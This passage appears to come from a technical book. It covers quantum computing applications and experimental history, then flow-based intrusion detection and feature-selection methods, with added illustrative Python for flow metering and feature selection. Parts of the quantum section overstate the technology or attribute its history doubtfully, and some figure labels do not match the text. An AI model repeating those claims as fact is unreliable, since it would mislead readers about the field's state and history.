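        print(f"eavesdropper={eve}: sifted={kept} error_rate={qber:.3f} "
              f"alarm={eavesdropping_suspected(qber)}")
```

With Eve present, about one sifted bit in four is wrong, because she picks the wrong basis half the time and Bob then reads a random bit; Alice and Bob see this by comparing a sample of their sifted bits.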


4.5.2 Quantum Computing and Memories 


This is the field in which entanglement and superposition are used directly
to perform operations on data. This idea was first introduced by Richard
Feynman and Yuri Manin [3]. Quantum computers will be more efficient than
classical ones, with fewer problems. Along with integer factorization, many
other algorithms and problems are analysed by making use of quantum
computing techniques [8, 11].

A large number of inventions have occurred in this domain. Researchers
have invented different quantum computer models. Some of them are the
one-way quantum computer, the quantum gate array, the topological quantum
computer, and the adiabatic quantum computer. Researchers have found that
quantum computers based on the von Neumann architecture are possible. A
quantum computing breakthrough with superconducting integrated circuits is
also possible [9].

Figure 4.1 Quantum satellite transmission [Bacsardi et al., [4]].


4.5.3 Satellite Communication Based on Quantum Computing 


A quantum channel is a channel that carries out the transmission of
classical and quantum information. Figure 4.3 depicts the transmission of
classical information from the sender to the receiver through a quantum
channel (satellite). Communication starts in the classical domain and is
later converted to the quantum domain. This can be seen as an analogy to
channel coding and source coding in classical computing. The channel is
used to send data. Bob receives the damaged bits, performs the quantum
transformations (block D) and finally measures the data [10].

Figure 4.2 Configurations of satellite communication [Marshall et al., [6]].

Figure 4.3 Vertical and horizontal polarization [1, 9].


4.5.4 Machine Learning & Artificial Intelligence 


Artificial intelligence and machine learning are the booming areas in the 
2020s. These emerging technologies have affected the lives of humans. Some 
widespread applications in everyday life are in voice, handwriting and image 
recognition. It has become challenging for traditional computers to provide 
that level of accuracy and speed, which has led to the development of quan- 
tum computers that provide processing of complex problems in fractions of 
a second. This would have taken traditional computers thousands of years. 


4.6 Optical Quantum Computing 


The basic unit of light is the photon. A photon is encoded by using
polarization, and optical quantum computing basically uses polarization.
Electromagnetic theory defines the physical nature of light. The direction
of the electric part of light is defined by the direction of polarization. If
the vertical and horizontal directions are defined as 1 and 0 by using
polarization encoding, then other polarizations, e.g., elliptical
polarization, 1/4-polarization and circular polarization, are
superpositions of 1 and 0.

Figure 4.4 Representation of vector of different polarizations (photon) [1] Sandorlme et al., [9].

A photon passes through the component and makes a measurement on
its polarization state [13, 14].


4.7 Experimental Realisation of Quantum Computer 


The simple architecture helps in making the quantum computer smaller,
faster and cheaper. The conceptual intricacies are causing difficulty in its
experimental realization. Many attempts have been made in this field with
fruitful outputs. However, the time is not far away when the digital
computer will be fully replaced by the quantum computer. Some of the many
attempts that have been made are summarized below.


4.7.1 Hetero-Polymers 


The first quantum computer based on a hetero-polymer was built in 1988 by
Teich and was later improved by Lloyd in 1993. A linear array of atoms is
used as memory cells in a hetero-polymer computer. Information is stored on
a cell by pumping the corresponding atom into an excited state. Instructions
are given to the hetero-polymer by means of laser pulses. The duration and
shape of the pulse decide the nature of the computation that is performed
on the chosen atoms.


4.7.2 Ion Traps


A quantum computer based on an ion trap was first proposed by Cirac
and Zoller in 1995, and it was worked on first by Monroe and collaborators
in 1995 and then by Schwarzschild in 1996. This computer encodes data in
the energy states of ions and in the modes of vibration between the ions.
Conceptually, a separate laser operates each ion. It was demonstrated that
the ion trap computer can be helpful in evaluating Fourier transforms,
which leads to Shor's factoring algorithm (based on Fourier transforms).


4.7.3 Quantum Electrodynamics Cavity 


A quantum electrodynamics (QED) cavity computer was invented by
Turchette and collaborators in 1995. This computer consists of a QED cavity
filled with cesium atoms, together with an arrangement of lasers, polarizer,
phase shift detectors and mirrors.


4.7.4 Quantum Dots 


Quantum computers based on quantum dot technology use a simple
architecture. They also require less sophisticated theoretical,
experimental, and mathematical skills. Quantum gates are fabricated using an
array of quantum dots in which the dots are connected using the split gate
technique. This technique has an advantage: the qubits are controlled
electrically.


4.8 Challenges of Quantum Computing 


Quantum computing, if built at large scale, is a novel technology that can
carry out computation powerfully. However, fabrication, verification and
architecture are some of the challenges that it presents. As it has to store
complex information in one bit, the building, verification and design of
quantum computers become very difficult. They are fragile and should be
operated at low temperatures. They very often give more errors than
classical computers, so error correction is one of the dominant tasks in the
building of quantum computers.


4.9 Conclusion and Future Scope


Many universities, research groups, and colleges are working on this topic,
hence the quantum computing field is developing rapidly. More and more
research is being done and is used in various applications. The challenge
in this field is to move from carrying out experiments to controlling the
phenomenon of quantum computing. A system that obeys quantum mechanical
laws can exceed the performance of the conventional computer. It might take
years to build quantum computers commercially, but it would definitely
bring about a revolution.


Abstract

During the last decade, computer network security has undergone an
incredible revolution with the rapid development of high-speed networking
technologies. A good example is NetFlow, which has advanced drastically
since the arrival of flow-enabled networking devices. According to a study,
70% of the network operators have devices with flow-exporting capabilities.
NetFlow export technology aggregates network packets into flows. The growth
in the number of IP packet features in the NetFlow format is a huge
advantage. In other words, if the latest version of NetFlow is enabled on
your network device, a lot of network information becomes available to you;
for example, NetFlow v9 traffic has 280 features. All of these features may
be necessary for serving many network issues. However, a network Intrusion
Detection System (IDS) may not need all of them. Some may be redundant and
not relevant. Such features can affect the performance of the IDS. At the
same time, the time required for identifying an attack and the resource
consumption of the IDS increase. An IDS detects malicious traffic based on
the features extracted from network flows. This article reviews the use of
feature selection for the flow-based network IDS.


5.1 Introduction


Ever-evolving research in the computer networking field has made it
possible to get Internet (that is, nothing but computer network) access
everywhere. There has also been tremendous growth in network speed compared
to ten years ago (when it was just in KBs). Along with the increase in speed,
the number of Internet (computer network) users is also increasing. This
rapid proliferation in technology has caused ever-increasing network
traffic, which is burdening network security analysis tools. These tools
need to cope with the increasing network speed and the increasing number of
users or network traffic. Unfortunately, they are not coping. An Intrusion
Detection System (IDS) is one such network analysis tool; it classifies
network traffic into normal and malicious traffic. However, the old
packet-based approach used in such IDS looks insufficient with increased
speed and traffic. This issue has motivated researchers to come up with a
flow-based IDS approach. Some research uses a feature selection approach
before classifying the traffic using a machine learning-based classifier.
Applying feature selection before the classifier improves its performance
and saves memory and time.

The need for feature selection in the flow-based IDS approach is motivated
by the following:


i. Today, all high devices are equipped with a flow capturing
facility, which makes flow records readily available and the
approach cost-effective.

ii. The IPFIX protocol standard defines how IP Flow information
can be exported to the devices.

iii. The approach suits today's high speed and increased volume of
network data.

iv. It can deal with newer protocols due to the absence of
payload.

v. The number of IP flow features increases with each flow-based
(NetFlow) version.

vi. Irrelevant and redundant features are present in flow-based
data.

vii. Less storage is required for flow-based data.
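Item vi can be made concrete with a small correlation filter that drops constant, irrelevant and redundant flow features before a classifier sees them. This is an added example, not a method taken from the chapter: the feature names, the constructed flow values, the labels and both thresholds are assumptions, and Pearson correlation stands in for whichever relevance measure a real study would use.

```python
import math

# Constructed flow features (one list entry per flow), not real NetFlow fields.
FEATURES = {
    "packets":          [100, 120, 80, 100, 2, 1, 3, 2],
    "bytes":            [50000, 60000, 40000, 50000, 1000, 500, 1500, 1000],
    "ip_version":       [4, 4, 4, 4, 4, 4, 4, 4],
    "syn_only":         [0, 0, 0, 0, 1, 1, 1, 0],
    "src_port_low_bit": [0, 1, 0, 1, 0, 1, 0, 1],
}
# Constructed labels: 0 = normal flow, 1 = malicious flow.
LABELS = [0, 0, 0, 0, 1, 1, 1, 1]


def pearson(xs, ys):
    """Pearson correlation coefficient; 0.0 if either column has no variance."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sxx = sum((x - mx) ** 2 for x in xs)
    syy = sum((y - my) ** 2 for y in ys)
    if sxx == 0 or syy == 0:
        return 0.0
    return sxy / math.sqrt(sxx * syy)


def select_features(features, labels, min_relevance=0.3, max_redundancy=0.95):
    """Return (kept, dropped) where dropped maps a feature name to the reason.

    1. A constant column carries no information.
    2. A column whose |correlation| with the label is below min_relevance is
       treated as irrelevant.
    3. Of two columns correlated at max_redundancy or more, only the more
       relevant one is kept.
    """
    dropped, relevance = {}, {}
    for name, column in features.items():
        if len(set(column)) == 1:
            dropped[name] = "constant"
            continue
        score = abs(pearson(column, labels))
        if score < min_relevance:
            dropped[name] = "irrelevant"
        else:
            relevance[name] = score

    kept = []
    # Most relevant first. Rounding makes exact ties fall back to input order,
    # because sorted() is stable.
    for name in sorted(relevance, key=lambda n: -round(relevance[n], 6)):
        twin = next((k for k in kept
                     if abs(pearson(features[name], features[k])) >= max_redundancy),
                    None)
        if twin is None:
            kept.append(name)
        else:
            dropped[name] = "redundant with " + twin
    return kept, dropped


if __name__ == "__main__":
    kept, dropped = select_features(FEATURES, LABELS)
    print("kept:", kept)
    for name, reason in dropped.items():
        print(f"dropped {name}: {reason}")
```

Here `bytes` is an exact multiple of `packets`, so it adds nothing once `packets` is kept, while `syn_only` survives because it is relevant to the label and only moderately correlated with `packets`.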


The chapter’s objective is to present current futuristic feature selection
methods in flow-based IDS.


5.1.1 Intrusion Detection System


There exist multiple ways to classify IDS. In the literature,
classifications based on the detection model, the audit source location or
the sort of study are common, as depicted in Figure 5.1. In this chapter,
IDS is classified as signature-based versus anomaly-based and host-based
versus network-based.


5.1.2 IDS Classification 


An IDS may be classified in various ways based on parameters such as the
sort of processing (detection model), the sort of study, or the source of
the information (audit source location), as shown in Figure 5.1. However, we
will classify IDS into two widely known classifications, signature versus
anomaly-based and host versus network-based.

Signature-based intrusion detection is used to detect known attacks whose
patterns or rules are stored in a database. Incoming information (data
packets) is analyzed, and if its pattern matches one stored in the database,
the packets are termed malicious and the system is alerted about the
attack. But this approach fails to detect attacks whose signatures are not
stored in the database. This problem is solved by the anomaly detection
approach. Here a normal profile of the system is created by training the
IDS from time to time. This is a dynamic approach for partially known and
unseen attacks. When the IDS encounters any deviation from the normal
profile, it alerts system administration about the event. But this approach
suffers from a number of false positives [2].

Figure 5.1 Intrusion detection system classification [1].

A host-based IDS needs to be installed on every system on the network,
similar to antivirus software. Thus it can protect only the system on
which it is installed, not the complete network. To protect the
complete network, a network-based IDS (NIDS) needs to be installed on
the network. It is situated in the network so that all network traffic
has to pass through it. A NIDS can be based on the packet-based
approach or the flow-based approach. In the packet-based approach,
each packet flowing through the network is analyzed at the NIDS.
However, the increase in network traffic at high network speeds can
result in packets being dropped at the NIDS, and this can affect its
performance. The flow-based approach gives the solution to this
problem. In this approach, packets with similar information are
grouped into flow buckets, and the NIDS later analyzes specific fields
of these flow buckets. This approach suits high-speed networks
carrying large volumes of traffic [3]. The approach is new and has
attracted researchers for the past few years. The two desirable
features of an IDS are speed and accuracy [4].


5.2 IP Flows 


Capturing IP flows has many significant benefits; hence, all vendors
provide their routers with flow monitoring and measurement facilities.
An IP flow is captured and stored in flow records, which are used for
traffic characterization [5]. Netflow is Cisco's proprietary
technology.

The definition of IP flow given by IPFIX (IP Flow Information Export) 
is “a set of IP packets passing through an observation point in the network 
during a particular interval of time. Moreover, all packet clusters to a par- 
ticular flow have a set of common properties”. 

According to the IPFIX (Internet Protocol Flow Information Export)
documentation, a flow is identified by parameters like source address,
destination address, source port number, destination port number, and
IP protocol:


(ip_src, ip_dst, port_src, port_dst, proto)


These elements are called flow keys or common properties. These flow
keys are essential for capturing the behavior of the network [6].
5.2.1 The Architecture of Flow-Based IDS 


A Metering Process is in charge of collecting packets at Observation
Points, filtering them (if necessary), and aggregating data about
them. Using the IPFIX protocol, an Exporter sends this data to a
Collector, as shown in Figure 5.2 [6].

The flow-based approach inspects a group of packets flowing through
the network. This gives the IDS an aggregated view of network traffic.
As a result, the amount of data required for comparison is
substantially reduced [7]. Flow exporting and flow collection are the
two phases of the flow monitoring process. After packets are captured
by the flow exporter, they are provided to the flow collector in the
form of what are usually called flow records [8]. The flow collector
must obtain flow records from the flow exporter and store them in an
analytically valuable format. By aggregating packets from the same
flow, we may look for unusual traffic patterns that may indicate an
attack [9].
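The metering and collection steps described above can be sketched as follows. This is an added example, not code from the chapter: the Packet fields, the 30-second idle timeout, the fan-out check and the sample packets are all assumptions made for illustration.

```python
from collections import namedtuple
from statistics import pstdev

# One captured packet header: timestamp (s), the five flow keys, length (bytes).
Packet = namedtuple("Packet", "ts ip_src ip_dst port_src port_dst proto length")

IDLE_TIMEOUT = 30.0  # assumption: seconds of silence after which a flow is exported


def flow_key(pkt):
    """The five-tuple that decides which flow a packet belongs to."""
    return (pkt.ip_src, pkt.ip_dst, pkt.port_src, pkt.port_dst, pkt.proto)


def export_record(key, pkts):
    """Summarise the packets of one finished flow; no payload is kept."""
    times = [p.ts for p in pkts]
    lengths = [p.length for p in pkts]
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    return {
        "key": key,
        "start": times[0],
        "end": times[-1],
        "packets": len(pkts),
        "bytes": sum(lengths),
        "iat_min": min(gaps) if gaps else 0.0,  # packet inter-arrival times
        "iat_max": max(gaps) if gaps else 0.0,
        "len_std": pstdev(lengths),             # spread of packet lengths
    }


def meter(packets, idle_timeout=IDLE_TIMEOUT):
    """Metering process: group packets by flow key and emit flow records."""
    active = {}   # flow key -> packets seen so far for the open flow
    records = []
    for pkt in sorted(packets, key=lambda p: p.ts):
        key = flow_key(pkt)
        open_flow = active.get(key)
        if open_flow and pkt.ts - open_flow[-1].ts > idle_timeout:
            records.append(export_record(key, open_flow))  # idle timeout hit
            open_flow = None
        if open_flow is None:
            open_flow = active[key] = []
        open_flow.append(pkt)
    # Flush the flows that are still open when the capture ends.
    records.extend(export_record(k, p) for k, p in active.items())
    return sorted(records, key=lambda r: r["start"])


def single_packet_fanout(records):
    """Collector-side check: per source, how many distinct destination
    ports were touched by flows that consist of a single packet."""
    ports = {}
    for rec in records:
        if rec["packets"] == 1:
            ip_src, _, _, port_dst, _ = rec["key"]
            ports.setdefault(ip_src, set()).add(port_dst)
    return {src: len(seen) for src, seen in ports.items()}


# Constructed sample traffic (private/documentation addresses, protocol 6 = TCP).
PACKETS = [
    Packet(0.0, "10.0.0.5", "192.0.2.10", 51000, 443, 6, 60),
    Packet(0.5, "10.0.0.5", "192.0.2.10", 51000, 443, 6, 1500),
    Packet(1.5, "10.0.0.5", "192.0.2.10", 51000, 443, 6, 1500),
    Packet(2.0, "10.0.0.9", "192.0.2.10", 40001, 22, 6, 40),
    Packet(2.25, "10.0.0.9", "192.0.2.10", 40002, 23, 6, 40),
    Packet(2.5, "10.0.0.9", "192.0.2.10", 40003, 25, 6, 40),
    # Same five-tuple as the first flow, but after the idle timeout: a new flow.
    Packet(100.0, "10.0.0.5", "192.0.2.10", 51000, 443, 6, 60),
]

if __name__ == "__main__":
    flow_records = meter(PACKETS)
    for record in flow_records:
        print(record)
    print(single_packet_fanout(flow_records))
```

Seven packets collapse into five flow records, and the per-source fan-out of one-packet flows is the kind of aggregate pattern a flow-based IDS can examine without touching payload.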


5.2.2 Wireless IDS Designed Using Flow-Based Approach 


The wireless network is more complicated than the wired one. The two
technologies face different situations when dealing with security,
which is why a wired IDS cannot be used in wireless environments. To
support the 802.11 environment, the industry has been working for
several years on the hardware and software used in wireless networks.
Wired Equivalent Privacy (WEP) was one attempt, with a number of flaws
in its security mechanism, and the industry worked very hard to solve
the issues associated with WEP. This resulted in the introduction of
the WPA (Wi-Fi Protected Access) 128-bit encryption security
mechanism. One of the major problems associated with a wireless
network is detecting a rogue access point in the network. Figure 5.3
depicts the working of a flow-based wireless intrusion detection
system (WIDS). Here, a sniffer connected to the WIDS central
administration system captures packets from the wireless environment
and sends them to the WIDS. This system stores network packets in flow
record format using five-tuple information, i.e., source and
destination IP address, source port number, destination port number,
and protocol used. Later, these flow records are analyzed to detect
malicious activity in the wireless environment [10].

Figure 5.2 Architecture of IP flow-based IDS [6].

Figure 5.3 Flow-based wireless intrusion detection systems [10].

In order to protect the wireless network, one should know:


• Locations of all access points planted in your network

• Set of actions to be taken for an unauthorized access point
(rogue access point) detected within your network

• Total users accessing your wireless network

• Unencrypted information read or exchanged by such users.


5.2.3 Comparison of Flow- and Packet-Based IDS 


Packet-based (traditional) IDS are no longer adequate for today's
high-speed networks; flow-based IDS can substitute for packet-based
ones. However, they lack accuracy. The main advantage of a flow-based
IDS is that it works on less data than the packet-based approach, so
it requires fewer resources. However, the scarcity of data affects the
accuracy of the flow-based IDS: it gives reduced alert confidence and
more false alarms. Encryption technology, which generally affects
packet-based IDS, has no impact on flow-based IDS. The flow-based
approach does not deal with payload, so there is no privacy issue as
with the packet-based approach [11].


5.3 Feature Engineering 


Feature engineering exploits domain knowledge of the data to create
features that make machine learning algorithms work efficiently. In
other words, it is the method of formulating the most suitable
features given the data, the model, and the task. Automated feature
learning will obviate the need for manual feature engineering. Feature
engineering is the next buzzword after big data, and it involves both
selection and extraction of features. Feature selection is a method by
which a subset of specific features is selected for model
construction. It is an optimization problem. Nowadays, high-dimensional
data is everywhere, e.g., documents, text, brain MRI, images,
microarray data, time-series data, videos, security logs, etc.
Generally, feature selection is required in classification,
clustering, and regression tasks [12].

A feature is nothing but a numeric representation of a piece of raw
data, potentially helpful for prediction. A simple model can beat a
complex model if good features are provided. Features and models sit
between raw data and the desired insights, as shown in Figure 5.4. Not
only does model building play an essential role in a machine learning
workflow, but so do feature choices. This is a two-jointed lever, and
the choice of one affects the other. Valuable features make the
subsequent modeling steps easier, and the resulting model is more
capable of achieving the desired task. Features that are relevant to
the task and straightforward for the model to interpret are essential.
The number of features is also essential for the machine learning
model's efficiency. If there are not enough insightful features, the
model will not be able to complete the final task. If there are too
many features, or insignificant ones, the model will be more costly
and difficult to train. Something may go wrong during the training
phase, causing the model's performance to suffer [13]. Feature
selection is used to select valuable features, data mining to generate
rules using these features, and an ML classifier to detect the various
attacks. The main principle of feature selection is to select features
to the point (selecting only relevant features as per the purpose).

Figure 5.4 Feature engineering in machine learning workflow [13].


5.3.1 Curse of Dimensionality 


The concept of the curse of dimensionality can be understood with the
help of Figure 5.5. Initially the feature set contains zero attributes
and has no classification power. As we start adding features to the
feature set of any model under observation, the model's classification
power increases up to a limit. However, after reaching an optimal
number of features, adding further features starts lowering its
classification power. The reason behind this is that the feature set
may contain many irrelevant and redundant features. The feature space
increases exponentially as the number of features increases. In the
space it occupies, information becomes increasingly sparse. Sparsity
makes it hard for any approach to achieve statistical significance
[14]. For the sake of understanding, let's say you lost your 10 Rs
coin on a 150-meter line. How do you search for it? Just by walking
along that line. However, what if your coin is lost on a 150*150
square meter cricket ground? Now it is tough to roam around the ground
searching for the coin. At the next level, what if (assume) the ground
is 150*150*150 cubic meters, equivalent to a thirty-story-high
building? How will you find the coin? As the dimension increases, the
search problem gets worse. In machine learning, more features may give
more information but might not lead to better classification power.

Figure 5.5 Curse of dimensionality [14]. (Vertical axis: classifier
performance.)

When you have a large number of features, a large search space is 
required, and searching may take a long time depending upon the algo- 
rithm you choose. With limited training examples, you cannot work with 
many features because it leads to overfitting. When you have too many 
features, this will lead to the learning algorithm’s degradation and more 
computational time. This phenomenon is called a curse of dimensionality. 
Feature engineering is the solution to overcome the curse of dimensional- 
ity problem. Feature Engineering constitutes: 


1. Feature Selection: The procedure for selecting a small set of
features from the initially available feature set.

2. Feature Extraction: In the case of feature extraction, you 
may get some new features that may not be a part of the 
initially available feature set. For example, a feature set may 
contain the length and breadth of a particular unit; these two 
features can be reduced with the area as the new feature. 


Feature Engineering has the following advantages [15]: 


1. Redundant and irrelevant features degrade the ML algorithm's
performance; feature selection improves the data quality and
increases the resulting model's accuracy.

2. Difficulty in interpretation and visualization.

3. The computation may become infeasible.

4. Curse of dimensionality.

5. Reduces time complexity: less computation increasing algorithm
speed.

6. Reduces space complexity: fewer parameters at the end
require less storage.

7. Save the cost of observing the feature.

5.3.2 Feature Selection 


Feature selection is a method by which a subset of specific features is 
selected for model constructions. It is an optimization problem. Feature 
selection is useful in a variety of situations, including data mining, classifi- 
cation, and object recognition. It has been effective in eliminating unnec- 
essary and redundant features from the original dataset [16]. 


5.3.3 Feature Categorization 


The feature set’s reduction is based on the usefulness and redundancy 
of the feature concerning the objective. A feature can belong to any one of 
the following categories [17]: 


1. Strongly Important: For an optimal feature subset, a strongly 
important (relevant) feature is always required; it cannot be 
excluded without affecting the original conditional target 
distribution. 

2. Weakly Important, but not redundant: For an optimum sub- 
set, a feature may not always be essential and may be based 
on some conditions. 

3. Unimportant: It is not necessary to include the unimportant 
(irrelevant) features at all. 

4. Duplicate/Redundant: Duplicate or redundant features are 
those that are poorly related but can be replaced entirely by 
a group of other features so that the target distribution is not 
disturbed. 


5.4 Classification of Feature Selection Technique 


There are various approaches for feature selection, some of which are 
depicted in the following Figure 5.6. All approaches covered in this chap- 
ter are mutually inclusive; one feature selection technique can come under 
two categories. 


5.4.1 The Wrapper, Filter, and Embedded Feature Selection 


Filter Methods: A filter feature selection method assigns a score to
each feature using a statistical measure. The features are ranked by
score and either kept in or removed from the dataset. The methods are
often univariate and consider each feature independently with regard
to the dependent variable. Information Gain, Chi-Squared test,
Correlation coefficient scores, LDA, and PCA are examples of
filter-based feature selection methods. As the filter method evaluates
individual features, a feature that is not useful cannot provide a
significant performance improvement when taken with others.

Figure 5.6 Classification of feature selection.

Wrapper Methods: A wrapper technique selects a set of features by
preparing different combinations, evaluating them, and comparing them
to other combinations. A set of features is evaluated, and scores are
assigned based on accuracy using predictive models. Forward selection,
backward elimination, recursive feature elimination, and genetic
algorithm are examples of the wrapper method. The wrapper method's
limitation is that it is computationally expensive compared to the
filter method. A subset of features selected through the wrapper
method also makes the model more prone to overfitting.

Embedded Methods: An embedded method predicts which features
significantly improve the model's accuracy while the model is being
built. Decision tree, LASSO, Elastic Net, and Ridge Regression are
some examples of embedded methods. This method combines the filter and
wrapper methods.


5.4.2 Correlation, Consistency, and PCA-Based Feature 
Selection 


Correlation-Based Feature Selection (CFS): In CFS, features positively 
correlated are expected to be relevant for classification. Otherwise, they 
are not. As already mentioned, features are redundant if they are closely 
correlated and contain similar information. CFS is based on the idea that 
a vital feature subset contains features positively associated with the class 
but not with each other. As a result, CFS calculates the degree of associ- 
ation between features while also assessing predictive ability. It includes 
linear correlation-based models, e.g., PCA, IPA, ICA, and nonlinear cor- 
relation-based models, e.g., ISOMAP, LLI, etc. 

Consistency-Based Feature Selection: Full consistency means zero
inconsistency. The criterion for consistency-based feature selection
is the inconsistency rate of the data over a given set of features. If
two instances match on all attribute values but have different class
labels, they are inconsistent.
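The inconsistency criterion can be made concrete with a small search for the smallest consistent feature subset. This is an added example, not from the chapter: the feature names, the discretised values and the eight flow records are constructed, and the counting rule used (instances in a matching group minus those of its majority class) is the usual definition of the inconsistency rate, which the chapter does not spell out.

```python
from collections import Counter, defaultdict
from itertools import combinations

# Hypothetical discretised flow features, in the column order used by ROWS.
FEATURE_NAMES = ("proto", "dst_port_class", "pkt_count", "duration")

# Constructed flow records: (feature values, class label).
ROWS = [
    (("tcp", "web", "few", "short"), "normal"),
    (("tcp", "web", "many", "long"), "normal"),
    (("tcp", "web", "many", "short"), "attack"),
    (("udp", "other", "few", "short"), "normal"),
    (("udp", "other", "many", "short"), "attack"),
    (("udp", "other", "few", "long"), "normal"),
    (("tcp", "other", "many", "long"), "normal"),
    (("udp", "web", "many", "short"), "attack"),
]


def inconsistency_rate(rows, subset):
    """Fraction of instances that disagree with the majority label of the
    group of instances sharing the same values on the chosen features."""
    columns = [FEATURE_NAMES.index(name) for name in subset]
    groups = defaultdict(Counter)  # value pattern -> label counts
    for values, label in rows:
        pattern = tuple(values[c] for c in columns)
        groups[pattern][label] += 1
    inconsistent = sum(
        sum(labels.values()) - max(labels.values()) for labels in groups.values()
    )
    return inconsistent / len(rows)


def smallest_consistent_subsets(rows, threshold=0.0):
    """Exhaustive search, smallest subsets first, for feature subsets whose
    inconsistency rate does not exceed the threshold."""
    for size in range(1, len(FEATURE_NAMES) + 1):
        hits = [
            subset
            for subset in combinations(FEATURE_NAMES, size)
            if inconsistency_rate(rows, subset) <= threshold
        ]
        if hits:
            return hits
    return []


if __name__ == "__main__":
    for name in FEATURE_NAMES:
        print(name, inconsistency_rate(ROWS, (name,)))
    print(smallest_consistent_subsets(ROWS))
```

No single feature separates the classes here, but the pair of packet count and duration does, so the other two features can be dropped without introducing any inconsistency.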

Principal Component Analysis: PCA treats the instances of a data set
as vectors in a P-dimensional space, with P denoting the number of
attributes per instance. PCA's basic idea is to transform the given
data set into a Q-dimensional space, with Q<P, i.e., into a set of
linearly uncorrelated variables named principal components,
maintaining roughly the same information as in the original space.


The working principle of correlation-based feature selection (CFS) is 
that features within a class are highly correlated. Features are redundant if 
they are closely related. It calculates the degree of correlations. It includes 
linear correlation-based models, e.g., PCA, IPA, ICA, and nonlinear cor- 
relation-based models, e.g., ISOMAP. 
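The CFS idea (features associated with the class but not with each other) can be shown with a greedy forward search. This is an added example, not from the chapter: it uses Hall's merit heuristic with Pearson correlation, a formula the chapter does not state, and the feature names and the eight flow records are constructed.

```python
from itertools import combinations
from math import sqrt

# Constructed flow records; label 1 = attack, 0 = normal.
# bytes_per_s is an exact multiple of pkts_per_s (fixed packet size),
# so it is fully redundant; ttl is unrelated to the label.
FEATURES = {
    "pkts_per_s":  [10, 10, 10, 10, 1000, 1000, 1000, 1000],
    "bytes_per_s": [600, 600, 600, 600, 60000, 60000, 60000, 60000],
    "syn_ratio":   [0.25, 0.25, 0.75, 0.75, 0.25, 0.25, 0.75, 0.75],
    "ttl":         [64, 128, 64, 128, 64, 128, 64, 128],
}
LABELS = [0, 0, 0, 0, 0, 0, 1, 1]


def pearson(xs, ys):
    """Pearson correlation coefficient; 0.0 if either series is constant."""
    n = len(xs)
    mean_x, mean_y = sum(xs) / n, sum(ys) / n
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    sxx = sum((x - mean_x) ** 2 for x in xs)
    syy = sum((y - mean_y) ** 2 for y in ys)
    if sxx == 0 or syy == 0:
        return 0.0
    return sxy / sqrt(sxx * syy)


def merit(subset, features, labels):
    """CFS merit: k * r_cf / sqrt(k + k(k-1) * r_ff), where r_cf is the mean
    feature-class correlation and r_ff the mean feature-feature correlation
    (absolute values, so strong negative association also counts)."""
    k = len(subset)
    r_cf = sum(abs(pearson(features[f], labels)) for f in subset) / k
    pairs = list(combinations(subset, 2))
    r_ff = 0.0
    if pairs:
        r_ff = sum(abs(pearson(features[a], features[b])) for a, b in pairs) / len(pairs)
    return k * r_cf / sqrt(k + k * (k - 1) * r_ff)


def cfs_forward(features, labels, eps=1e-9):
    """Greedy forward search: keep adding the feature that raises the merit
    most, and stop when no candidate improves it by more than eps."""
    selected, best = [], 0.0
    while True:
        pick = None
        for name in features:
            if name in selected:
                continue
            candidate = merit(selected + [name], features, labels)
            if candidate > best + eps:  # ties go to the earlier feature
                pick, best = name, candidate
        if pick is None:
            return selected, best
        selected.append(pick)


if __name__ == "__main__":
    for name in FEATURES:
        print(name, round(merit([name], FEATURES, LABELS), 4))
    print(cfs_forward(FEATURES, LABELS))
```

On this data the search keeps pkts_per_s and syn_ratio: bytes_per_s adds no merit because it duplicates pkts_per_s, and ttl lowers the merit because it carries no information about the class.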


5.4.3 Similarity, Information Theoretical, Sparse Learning, 
and Statistical-Based Feature Selection 


The similarity-based feature selection method evaluates the importance
of features by their capacity to preserve data similarity. A good
feature should not randomly assign values to data instances. A good
feature should assign similar values to instances that are close to
each other. The closeness is calculated with the help of the data
similarity matrix. It uses the Laplacian score, Fisher score, and
Trace ratio criterion for finding the closeness of features.

Information-theoretical feature selection exploits different heuristic
filter criteria to measure the importance of a feature. It divides
features into strongly relevant, weakly relevant non-redundant, weakly
relevant redundant, and irrelevant. Entropy, conditional entropy,
information gain, etc., are some of the measures used to divide
features into these four groups.

The features selected by the methods mentioned earlier may not be
optimal for a particular learning task. The sparse learning-based
process is an embedded method with several advantages, such as
empirical success in many real-world applications, a strong
theoretical guarantee, and a flexible model for complex feature
structure. Lasso, its extensions to the multi-class or multivariate
problem, and multi-cluster feature selection are examples.

Algorithms in this category use different statistical measures for
calculating feature importance. Most of them are filter-based methods.
Most of the algorithms evaluate features individually, so feature
redundancy is inescapable. Some algorithms can handle only discrete
data. T-score and chi-square measures are used in this category. In a
computer network, it is assumed that internet traffic at the network
layer has statistical properties peculiar to some groups of
applications, allowing users to differentiate them from one another
using a statistical-based recognition method. The statistical
characteristics include the minimum and maximum packet inter-arrival
times and the standard deviation of packet length. The qualitative
analysis of different features helps researchers choose one or more
features to classify network traffic flows. A weight value could be
assigned to each feature to represent its importance. Many features
are used to classify network traffic, but using unrelated or redundant
features often negatively impacts the accuracy of most ML algorithms.
It can also make the system computationally expensive, since the
amount of information stored and processed increases. Therefore it is
suggested to select only an important set of features [18].


5.4.4 Univariate and Multivariate Feature Selection 


Univariate feature selection looks at each feature independently of
the others. Examples of univariate feature selection are the Pearson
Correlation Coefficient, Chi-square, F-score, Signal to noise ratio,
Mutual information, etc. It ranks features by importance, and users
determine the ranking cut-off. The univariate method measures some
correlation between two random variables, e.g., the Pearson
Correlation Coefficient. Multivariate feature selection considers all
features simultaneously.


5.5 Tools and Library for Feature Selection 


Some readily available software tools support feature selection with
machine learning algorithms, with libraries integrated within the
tools. Some of the widely used tools include WEKA, MATLAB, ROSE2, and
ROSETTA [19]. Researchers have also used libraries such as SCIKIT,
CARET [20], and DEAP [21].


5.6 Literature Review on Feature Selection 
in Flow-Based IDS 


Current internet connections to high-speed networks produce traffic in the 
gigabits per second range, necessitating rigorous analysis to understand 
network traffic activity at the packet level. To minimize packet analysis, 
aggregated network traffic information is currently interpreted in the form 
of flows. Hence the flows supply information and pattern about the traffic 
instead of packet analysis. A flow-based approach seems to be more prom- 
ising since it is more scalable in increasing network speed [22]. Improving 
the intrusion detection system's performance has been considered difficult 
due to the volatility, incompleteness, and redundancy in the voluminous 
network traffic pattern in a flow-based dataset. These underline the neces- 
sity of feature selection in IDS to identify the informative features and 
overlook the irrelevant or redundant features that degrade the IDS's
performance in computational complexity and detection rate [23].
Accuracy, reduced computation time, and false alarm rate are the key
